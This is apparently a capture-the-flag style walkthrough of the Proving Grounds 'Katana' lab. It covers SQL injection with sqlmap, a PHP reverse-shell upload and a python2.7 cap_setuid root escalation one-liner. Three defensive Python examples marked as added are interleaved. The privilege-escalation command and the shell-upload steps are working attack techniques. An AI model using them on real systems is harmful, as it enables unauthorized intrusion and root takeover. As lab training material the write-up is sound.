Offensive Security Proving Grounds (Katana)

Software Sinner
8 min read · Jan 23, 2024

Offensive Security offers free lab machines in their “Proving Grounds” library that I find very helpful for preparing for the OSCP. I will walk you through my experience with an “Easy” level machine called Katana, which in my opinion was not that easy, especially given its rabbit holes.

Enumeration:

I kicked off my autorecon scan and started looking through the open ports. I work by process of elimination, starting from the top and going down. I ruled out port 22 for now, until I gather valid SSH credentials or a key to connect to the target machine.

Nmap scan report for 192.168.204.83
Host is up, received user-set (0.082s latency).
Scanned at 2024-01-22 13:02:14 PST for 124s
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDp0J8d7K55SuQO/Uuh8GyKm2xlwCUG3/Jb6+7RlfgbwrCIOzuKXICcMHq4i8z52l/0x0JnN0GUIeNu6Ek/ZGEMK4y+zvAs0R6oPNlScpx0IaLDXTGrjPOcutmx+fy6WDW3/jJGLxwu+55d6pAjzzQR37P1eqH8k9F6fbv6YUFbU+i68x9p5bXCC1m17PDO98Che+q32N6yM26CrQMOl5t1OzO3t1pbvMd3VOQA8Qd+fhz5tpxtRBTSM9ylQj2B+z6XjJnbMPhnO3C1oaYHjjL6KiTfD5YabDqsBf+ZHIdZpM+7fOqKkgHa4bbIWPUXB/OuOJnORvEeRCALOzjcSrxr
| 256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDBsZi0z31ChZ3SWO/gDe+8WyFVPrFX7KgZNp8u/1vlhOSrmdZ32WAZZhTT8bblwgv83FeXPvH7btjDMzTuoYA8=
| 256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICo+dAzFw2csa366udGUkSre2W0qWWGoyWXwKiHk3YQc
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
7080/tcp open ssl/empowerid syn-ack ttl 61 LiteSpeed
|_http-server-header: LiteSpeed
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=1.55.254.232
| Issuer: commonName=katana/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=1.55.254.232
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-11T13:57:36
| Not valid after: 2022-05-11T13:57:36
| MD5: 0443:4a65:9ba1:0b75:ea8d:d1b8:c855:e495
| SHA-1: f89e:f85e:e6b3:6b10:4ebc:5354:80a0:0ae3:7e10:50cc
| -----BEGIN CERTIFICATE-----
| MIIDfTCCAmWgAwIBAgIUAXyRP1qy58OWLRWfP6CNoErg93wwDQYJKoZIhvcNAQEL
| BQAwTjEPMA0GA1UEAwwGa2F0YW5hMREwDwYDVQQKDAh3ZWJhZG1pbjELMAkGA1UE
| BhMCVVMxGzAZBgNVHREMEkROUy4xPTEuNTUuMjU0LjIzMjAeFw0yMDA1MTExMzU3
| MzZaFw0yMjA1MTExMzU3MzZaME4xDzANBgNVBAMMBmthdGFuYTERMA8GA1UECgwI
| d2ViYWRtaW4xCzAJBgNVBAYTAlVTMRswGQYDVR0RDBJETlMuMT0xLjU1LjI1NC4y
| MzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDUrg/knoyr6L8pJhlZ
| bEp2vj/1S/2lEiYzl3CbBtCDcNnSQLB2b7hC5vkzIFT5XOHcboXGSWWZ7g1Mlo/U
| irtoeuFYH0KyqYqKH6cJIUCUuIvsKFvEuSpcLB5oHMH1bNYHl8gk2uxnXDRHfxL1
| mhhV+tDewjGu7TzjWcGapvZmJKCQYJto6X4JagN/Xx7bWZQYKb22E/K/17PPg1Wg
| szg2C8a/sj/GWBiw5HADUx5FnQY0FfljwBBSQr10nGiex+w/NAYK8obUTsvUz1P7
| h2aG1V/9FtXHa6HK7YrApieVVTyBZTf4adj5OvmIT5w43vEBZXgCTUMLcf6JmiGy
| OMmdAgMBAAGjUzBRMB0GA1UdDgQWBBRpfqzDB3dS6IMabVgYjX+nQE8xZzAfBgNV
| HSMEGDAWgBRpfqzDB3dS6IMabVgYjX+nQE8xZzAPBgNVHRMBAf8EBTADAQH/MA0G
| CSqGSIb3DQEBCwUAA4IBAQCGCOYvcHj7XrE0fnuDbc4rdQzSVOCOK31F4aV4pWEh
| a6h/WQX9wQBHcs5XPl9D4JVDFQvtxBPWsmnzqqXm8CbeZ7cfAjzPGd994jFBeom6
| 3gnAXmCFSlRsPuqvKkGhBaSDDtzrWE4eZC0H2g9BJp0f6w4sRJSjCH1wZ30Jvgm+
| 9Hkcw9cG0WxkHEBk3SPB7d9iG6rFLJvZE4dcVbA6jtkhQZDrCAqaH69exWtKSQpV
| oBu7+tHFy/8uv7yRuC4fQY7Nmc0JD5otoax1yOpGN/eSz8zRFh+jl5VzdONtXQCO
| H8o8x5fxVi65kRQYil6UcG3lX56V51h/33dxWIDw+lAE
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Did not follow redirect to https://192.168.204.83:7080/
8088/tcp open http syn-ack ttl 61 LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8715/tcp open http syn-ack ttl 61 nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
Aggressive OS guesses: Linux 2.6.32 (87%), Linux 2.6.32 or 3.10 (87%), Linux 2.6.39 (87%), Linux 3.10 - 3.12 (87%), Linux 4.4 (87%), Synology DiskStation Manager 5.1 (87%), WatchGuard Fireware 11.8 (87%), Linux 2.6.35 (87%), Linux 4.9 (87%), Linux 3.4 (86%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Port 21 offered nothing: I found no usable exploits for this version of vsftpd, and anonymous login was disabled. I moved on to port 80 and started directory busting to find exposed entry points that could lead me to an exploit.

200      GET       23l       73w      655c http://192.168.204.83/
200 GET 96l 272w 3998c http://192.168.204.83/ebook/index.php
200 GET 8l 12w 100c http://192.168.204.83/ebook/bootstrap/css/jumbotron.css
200 GET 81l 207w 3153c http://192.168.204.83/ebook/admin.php
200 GET 64l 183w 2702c http://192.168.204.83/ebook/cart.php
200 GET 94l 221w 3337c http://192.168.204.83/ebook/publisher_list.php
200 GET 137l 295w 5164c http://192.168.204.83/ebook/books.php
200 GET 1l 2w 10c http://192.168.204.83/ebook/book.php
200 GET 91l 616w 72509c http://192.168.204.83/ebook/bootstrap/img/c_14_quick.jpg
200 GET 101l 278w 4155c http://192.168.204.83/ebook/contact.php
200 GET 5l 564w 23357c http://192.168.204.83/ebook/bootstrap/css/bootstrap-theme.min.css
200 GET 7l 430w 36816c http://192.168.204.83/ebook/bootstrap/js/bootstrap.min.js
200 GET 217l 1103w 87317c http://192.168.204.83/ebook/bootstrap/img/pro_asp4.jpg
200 GET 91l 569w 70695c http://192.168.204.83/ebook/bootstrap/img/android_studio.jpg
200 GET 118l 795w 81766c http://192.168.204.83/ebook/bootstrap/img/beauty_js.jpg
200 GET 4l 1305w 84345c http://192.168.204.83/ebook/bootstrap/js/jquery-2.1.4.min.js
200 GET 5l 1446w 122540c http://192.168.204.83/ebook/bootstrap/css/bootstrap.min.css
200 GET 96l 272w 3998c http://192.168.204.83/ebook/
200 GET 23l 73w 655c http://192.168.204.83/index.html

Navigating the endpoints discovered by directory busting, I could already see that this is an online bookstore. /admin.php was the first page on the list that grabbed my attention…

I tried what every good hacker would try ;) ‘admin’ / ‘admin’ as username and password, and sure enough I was able to log in. The submit query button, together with the site running PHP, already had me thinking of SQL injection.

I clicked around a bit and started taking note of some of the URL query string parameters, especially the one under the publisher tab.

Publisher page

I opened Burp Suite, captured the request, and saved it to a file with a .req extension to run sqlmap against.

Note: sqlmap is not allowed on the OSCP since it is considered an autopwn tool. In the real world there are no rules and any tool can be used, c'mon offsec….

sqlmap -r book.req --current-user

sqlmap identified that the backend was using a MySQL database and retrieved the current database user, ‘ebook’.
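To show why a query-string parameter like the publisher id was injectable in the first place, here is an added example (not code from the post or the ebook application) of the weak query pattern beside the hardened one. The `publisher` table, its columns and the sqlite3 backend are assumptions standing in for the real MySQL schema; the data is constructed.

```python
import sqlite3

# Constructed stand-in for the bookstore's publisher table (the real app uses MySQL;
# sqlite3 keeps the example self-contained). Table and column names are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE publisher (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO publisher VALUES (?, ?)",
                     [(1, "Packt"), (2, "O'Reilly"), (3, "Manning")])
    return conn

def lookup_publisher_vulnerable(conn, pub_id):
    # Hypothetical reconstruction of the weak pattern: the query-string value is pasted
    # straight into the SQL text, so SQL syntax in the value changes the query's logic.
    sql = "SELECT name FROM publisher WHERE id = " + pub_id
    return sorted(row[0] for row in conn.execute(sql))

def lookup_publisher_safe(conn, pub_id):
    # Two independent defences: validate the type first (the parameter is an integer
    # id and nothing else), then bind it as a parameter so the driver never lets the
    # value be parsed as SQL.
    try:
        id_value = int(pub_id)
    except (TypeError, ValueError):
        return []
    rows = conn.execute("SELECT name FROM publisher WHERE id = ?", (id_value,))
    return sorted(row[0] for row in rows)

if __name__ == "__main__":
    db = make_db()
    for value in ("2", "2 OR 1=1"):
        print(repr(value), "vulnerable ->", lookup_publisher_vulnerable(db, value))
        print(repr(value), "safe       ->", lookup_publisher_safe(db, value))
```

With the literal id both functions return one row; with a tautology appended, the concatenated query returns every publisher while the parameterised one returns nothing, which is exactly the difference an automated scanner keys on when it reports a boolean-based injection.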

I did some further digging with other sqlmap commands to dump the database, and it gave me username ‘admin’ and password ‘admin’, which we already had. Going back to my nmap results, port 8088 was my next target. It presented the same Katana page, so I began directory busting and found the following endpoints:

200      GET       23l       73w      655c http://192.168.204.83:8088/
403 GET 14l 107w 1227c http://192.168.204.83:8088/.htaccess
403 GET 14l 107w 1227c http://192.168.204.83:8088/blocked/
200 GET 114l 310w 5472c http://192.168.204.83:8088/docs/index.html
200 GET 108l 1128w 14854c http://192.168.204.83:8088/docs/Redirect_Context.html
200 GET 103l 647w 8201c http://192.168.204.83:8088/docs/VHWebSocket_Help.html
200 GET 117l 1576w 18329c http://192.168.204.83:8088/docs/AdminGeneral_Help.html
200 GET 98l 358w 6146c http://192.168.204.83:8088/docs/External_LB.html
200 GET 183l 716w 8919c http://192.168.204.83:8088/docs/intro.html
200 GET 114l 1695w 20762c http://192.168.204.83:8088/docs/CGI_Context.html
200 GET 146l 579w 7529c http://192.168.204.83:8088/docs/admin.html
200 GET 131l 1255w 14760c http://192.168.204.83:8088/docs/Templates_Help.html
200 GET 144l 3075w 31651c http://192.168.204.83:8088/docs/Module_Help.html
200 GET 41l 93w 3542c http://192.168.204.83:8088/docs/img/ols_logo.svg
200 GET 124l 1622w 19869c http://192.168.204.83:8088/docs/AdminListeners_SSL_Help.html
200 GET 104l 801w 10713c http://192.168.204.83:8088/docs/External_WS.html
200 GET 123l 2456w 28993c http://192.168.204.83:8088/docs/Static_Context.html
200 GET 179l 1138w 11734c http://192.168.204.83:8088/docs/ExtApp_Help.html
200 GET 152l 4653w 49643c http://192.168.204.83:8088/docs/ServSecurity_Help.html
200 GET 106l 841w 11066c http://192.168.204.83:8088/docs/Listeners_General_Help.html
200 GET 109l 1200w 15882c http://192.168.204.83:8088/docs/LB_Context.html
200 GET 149l 3195w 35815c http://192.168.204.83:8088/docs/VHGeneral_Help.html
200 GET 119l 1664w 19638c http://192.168.204.83:8088/docs/VirtualHosts_Help.html
200 GET 186l 1080w 10023c http://192.168.204.83:8088/docs/config.html
200 GET 818l 6061w 40937c http://192.168.204.83:8088/docs/license.html
200 GET 119l 2175w 24021c http://192.168.204.83:8088/docs/External_LSAPI.html
200 GET 118l 2287w 24785c http://192.168.204.83:8088/docs/VHSecurity_Help.html
200 GET 126l 1723w 19804c http://192.168.204.83:8088/docs/ServerStat_Help.html
200 GET 109l 1184w 15804c http://192.168.204.83:8088/docs/FCGI_Context.html
200 GET 119l 2172w 23947c http://192.168.204.83:8088/docs/External_FCGI.html
200 GET 104l 832w 10987c http://192.168.204.83:8088/docs/External_Servlet.html
200 GET 109l 1206w 15961c http://192.168.204.83:8088/docs/Proxy_Context.html
200 GET 228l 827w 7690c http://192.168.204.83:8088/docs/css/hdoc.css
200 GET 151l 3052w 34966c http://192.168.204.83:8088/docs/ServGeneral_Help.html
200 GET 106l 983w 12895c http://192.168.204.83:8088/docs/External_PL.html
200 GET 121l 1934w 22058c http://192.168.204.83:8088/docs/App_Server_Help.html
200 GET 102l 534w 7886c http://192.168.204.83:8088/docs/AdminListeners_General_Help.html
200 GET 102l 701w 9684c http://192.168.204.83:8088/docs/AdminSecurity_Help.html
200 GET 111l 589w 7502c http://192.168.204.83:8088/docs/Context_Help.html
200 GET 220l 1008w 10438c http://192.168.204.83:8088/docs/install.html
200 GET 106l 1042w 13106c http://192.168.204.83:8088/docs/Rewrite_Help.html
200 GET 109l 1220w 16083c http://192.168.204.83:8088/docs/Servlet_Context.html
200 GET 109l 1506w 17324c http://192.168.204.83:8088/docs/ServLog_Help.html
200 GET 161l 927w 9438c http://192.168.204.83:8088/docs/security.html
200 GET 112l 677w 8837c http://192.168.204.83:8088/docs/ScriptHandler_Help.html
200 GET 102l 317w 5343c http://192.168.204.83:8088/docs/webconsole.html
200 GET 119l 2177w 24019c http://192.168.204.83:8088/docs/External_FCGI_Auth.html
200 GET 109l 1178w 15735c http://192.168.204.83:8088/docs/Module_Context.html
200 GET 109l 1228w 16106c http://192.168.204.83:8088/docs/LSAPI_Context.html
200 GET 128l 1917w 22862c http://192.168.204.83:8088/docs/VHSSL_Help.html
200 GET 129l 2009w 23811c http://192.168.204.83:8088/docs/Listeners_SSL_Help.html
200 GET 124l 2414w 28750c http://192.168.204.83:8088/docs/App_Server_Context.html
200 GET 115l 1877w 22457c http://192.168.204.83:8088/docs/Java_Web_App_Context.html
200 GET 147l 3368w 37963c http://192.168.204.83:8088/docs/ServTuning_Help.html
200 GET 114l 310w 5472c http://192.168.204.83:8088/docs/
200 GET 23l 73w 655c http://192.168.204.83:8088/index.html
200 GET 494l 2889w 50733c http://192.168.204.83:8088/phpinfo.php
401 GET 14l 106w 1242c http://192.168.204.83:8088/protected/
200 GET 35l 202w 1800c http://192.168.204.83:8088/upload.php
200 GET 198l 531w 6480c http://192.168.204.83:8088/upload.html

Idk about you, but the first endpoint that caught my eye was /upload.html.

Exploitation:

I knew the backend was running PHP, so I needed to upload a PHP reverse shell.

Kali ships one in this default directory that can be copied and altered:

cd /usr/share/webshells/php
sudo cp php-reverse-shell.php ~/Documents/oscp/katana

I opened the file with vim and changed the target IP and port to those of my listener.

I made sure to upload it twice, once in each browse-button section, just in case. The output message for the file upload says “Moved to other web server:”, so I visited each web port with the name of my PHP shell file appended to the URL and got a hit on port 8715.

Note: Pay close attention to the new file name after you upload it, because the server renames your original file: it prepends katana_ to the file name.
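The rename the post observed changes the name but not the extension, so the web server on the receiving host still treats the file as PHP. The following is an added example (not the upload handler from the Katana box, whose source the post does not show) of what a hardened upload check looks like: an extension allow-list, a refusal of script extensions anywhere in the name, a content check against the file's magic bytes, and a server-generated stored name. The policy, the `UPLOAD_DIR` path and the `katana_rename` reconstruction are assumptions; the sample file names and byte strings are constructed.

```python
import os
import secrets

# Assumed policy for an image/PDF upload form. The page only shows that a .php file
# was accepted and executed; everything below is the check that would have refused it.
ALLOWED_EXTENSIONS = {"jpg", "png", "gif", "pdf"}
EXT_ALIASES = {"jpeg": "jpg"}
SCRIPT_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "phps"}
MAGIC_BYTES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
UPLOAD_DIR = "/var/lib/bookstore/uploads"  # assumed: a directory no web server serves

def katana_rename(original):
    """Reconstruction of the rename the post observed: a 'katana_' prefix, nothing else."""
    return "katana_" + original

def check_upload(original, head):
    """Return (accepted, detail). On acceptance detail is the server-chosen stored
    name; on rejection it is the reason. `head` is the first bytes of the content."""
    base = os.path.basename(original.replace("\\", "/"))
    if "." not in base:
        return False, "no extension"
    stem, ext = base.rsplit(".", 1)
    ext = EXT_ALIASES.get(ext.lower(), ext.lower())
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension %r not in allow-list" % ext
    # 'shell.php.jpg' style names: a script extension anywhere in the name is refused,
    # because some server configurations dispatch on the first extension they recognise.
    if any(part.lower() in SCRIPT_EXTENSIONS for part in stem.split(".")):
        return False, "script extension embedded in file name"
    if not any(head.startswith(m) for m in MAGIC_BYTES[ext]):
        return False, "content does not match %r" % ext
    # The stored name is generated server-side; nothing from the client survives into
    # the path, so the uploader cannot choose a name the web server would execute.
    return True, "%s.%s" % (secrets.token_hex(16), ext)

def stored_path(stored_name):
    """Where an accepted file is written: outside every document root."""
    return os.path.join(UPLOAD_DIR, stored_name)

if __name__ == "__main__":
    # Constructed inputs: the post's shell file, its renamed form, and a real-looking JPEG.
    for name, head in [("php-reverse-shell.php", b"<?php\n"),
                       (katana_rename("php-reverse-shell.php"), b"<?php\n"),
                       ("cover.jpeg", b"\xff\xd8\xff\xe0JFIF")]:
        print(name, "->", check_upload(name, head))
```

Note that `katana_php-reverse-shell.php` fails the same allow-list check as the original name: a prefix adds nothing, because the extension is what decides whether the server executes the file.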

I switched to my netcat listener in the terminal and got a shell!

The local.txt was not in its usual obvious location, so I ran linpeas.sh and was able to locate it under /var/www.

Getting root was pretty tough for me and I had to do some research. Reading the highlighted part of the linpeas output, I saw a capability-based privesc: a capability with the +ep flags is set on python2.7. I used this command to enumerate file capabilities:

getcap -r / 2>/dev/null

With the command above run from my shell, the only thing left was root access. The listing showed python2.7 carrying a capability whose flags are +ep, meaning it sits in both the effective and permitted sets of any process that executes the binary; since www-data can run python2.7, www-data gets that capability for the duration of the program, so we can escalate from the low-privilege shell to root with the command below.

/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
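From the defender's side, the finding above is something a routine audit should catch before anyone lands a shell. This added example (not from the post or from linpeas) parses `getcap -r` output, flags binaries whose effective set includes an identity- or permission-bypassing capability, rates interpreters as the worst case, and proposes the `setcap -r` removal. The sample output is constructed; only the python2.7 line mirrors the shape of the finding in the post, and the other paths are made up. The `audit_live_system` helper runs the same check on the current host when `getcap` is installed.

```python
import re
import shutil
import subprocess

# Constructed sample of getcap output, in both formats libcap has printed over the years
# (older "path = caps+flags", newer "path caps=flags"). Only the python2.7 line mirrors
# the post's finding; the remaining lines are invented for contrast.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/local/bin/backup_tool cap_dac_read_search=ep
"""

# Capabilities that let a process change identity or bypass file permissions; any of
# these in the effective set of a general-purpose binary is a root-equivalent finding.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_chown", "cap_fowner", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
}
INTERPRETER_RE = re.compile(r"(python|perl|ruby|php|node|lua)[0-9.]*$")
LINE_RE = re.compile(
    r"^(?P<path>/\S+)\s+(?:=\s+)?(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)\s*$")

def parse_getcap(text):
    """Yield (path, set_of_caps, flags) for each line getcap printed."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("path"), set(m.group("caps").split(",")), m.group("flags")

def audit_getcap_output(text):
    """Return one finding dict per binary with a dangerous capability in its effective set."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        risky = caps & DANGEROUS_CAPS
        # 'e' (effective) means the capability is live as soon as the file runs, for
        # whoever runs it; www-data needed nothing beyond execute permission.
        if not risky or "e" not in flags:
            continue
        severity = "high" if INTERPRETER_RE.search(path) else "medium"
        findings.append({
            "path": path, "caps": sorted(risky), "flags": flags, "severity": severity,
            "remediation": "setcap -r " + path,  # drops the file's capability set entirely
        })
    return findings

def audit_live_system():
    """Run the same audit on this host; returns [] when getcap is not installed."""
    if shutil.which("getcap") is None:
        return []
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return audit_getcap_output(out.stdout)

if __name__ == "__main__":
    for f in audit_getcap_output(SAMPLE_GETCAP):
        print("[%s] %s %s (%s) -> %s" % (f["severity"], f["path"],
                                          ",".join(f["caps"]), f["flags"], f["remediation"]))
```

An interpreter with cap_setuid in its effective set is rated high because, unlike a purpose-built tool, it will run whatever program text the caller hands it. ping and tcpdump are left alone: their network capabilities are the legitimate reason they carry a capability at all.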
